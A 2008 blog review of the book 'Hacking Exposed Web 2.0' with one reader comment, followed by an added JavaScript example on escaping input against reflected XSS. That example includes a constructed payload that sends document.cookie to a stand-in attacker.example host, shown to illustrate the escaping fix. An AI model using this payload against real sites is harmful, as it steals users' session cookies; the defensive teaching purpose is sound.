02/29/2008

Book review: Hacking Exposed Web 2.0

2008, by Rich Cannings, Himanshu Dwivedi and Zane Lackey

Some remarks after closing the book.

* I didn't know that Flash applications were that powerful and dangerous, and even more so when they are combined with anti-DNS pinning (DNS rebinding) attacks.

* XSS seems to be only at the beginning of its road into networks and into the interactivity of websites. The possibilities seem endless.

* ActiveX needs to be secured or not allowed at all. Period.

The book gives a lot of code; it is nearly a manual for attackers. It also gives a lot of defensive tips, but these seem far less ordered and structured. What I mean is that it lacks a procedure of things you should have done and tested, a kind of checklist.

Another weakness of the book is that it pays a lot of attention to the authors' own security firm and not much to other initiatives, but I presume you also read other books, so this shouldn't influence you too much, should it?

I wouldn't read it as a first introduction, but if you have already read some material about hacking Web 2.0 applications, then this should be your next book. And if the people around you aren't convinced yet that you need a web application firewall and a more static website without Flash, ActiveX and the like, then throw this book at them.

In fact I find it a depressing book. Maybe we should send copies to all the hypers and investors of Web 2.0, to show them that the possibilities are unlimited... for hackers.


Comments

Good review, pretty much right on. If you've read XSS Attacks already, it makes the book much more readable from a tech perspective. Not sure about the book needing a checklist; seems like every book has a checklist. The majority of the countermeasures are the same as for Web 1.0: don't trust user input and filter/escape all user input.

Posted by: CG | 03/01/2008
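CG's comment above ends on the one countermeasure that carries over unchanged from Web 1.0: escape untrusted input before it reaches the page. As an added example (editor's code, not from the book, the reviewer or the commenter), the following JavaScript puts a reflected-XSS rendering pattern beside its escaped form. The search-results template, the escaping table, the tag check and the attacker payload are all constructed for illustration.

```javascript
// Added example: context-aware escaping of untrusted input before it is
// interpolated into HTML. Template, payload and checks are constructed here;
// nothing in this block is taken from the book under review.

// Every HTML-significant character is mapped to an entity, so user data can
// never close the surrounding element or open a new tag or attribute.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Rendering that trusts the query string: the classic reflected XSS.
function renderVulnerable(searchTerm) {
  return `<p>Results for: <b>${searchTerm}</b></p>`;
}

// Same page, but the untrusted value is escaped for the HTML text context
// it lands in. (Attribute, URL and script contexts need their own encoders.)
function renderSafe(searchTerm) {
  return `<p>Results for: <b>${escapeHtml(searchTerm)}</b></p>`;
}

// Small check to compare the two outputs: does the rendered markup contain
// any element other than the ones the template itself emits?
function containsForeignTag(html, allowed = ["p", "b"]) {
  const tags = [...html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)].map((m) =>
    m[1].toLowerCase()
  );
  return tags.some((t) => !allowed.includes(t));
}

// Constructed attacker payload, as it might arrive in ?q=...
const PAYLOAD =
  '"><script>document.location="http://attacker.example/?c="+document.cookie</script>';

console.log("vulnerable:", renderVulnerable(PAYLOAD));
console.log("foreign tag present:", containsForeignTag(renderVulnerable(PAYLOAD)));
console.log("safe:", renderSafe(PAYLOAD));
console.log("foreign tag present:", containsForeignTag(renderSafe(PAYLOAD)));
```

The escaped version still shows the attacker's string to the user, but only as inert text; the `containsForeignTag` helper is deliberately crude and exists only to make the difference between the two renderings visible in a terminal, not as a production filter.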
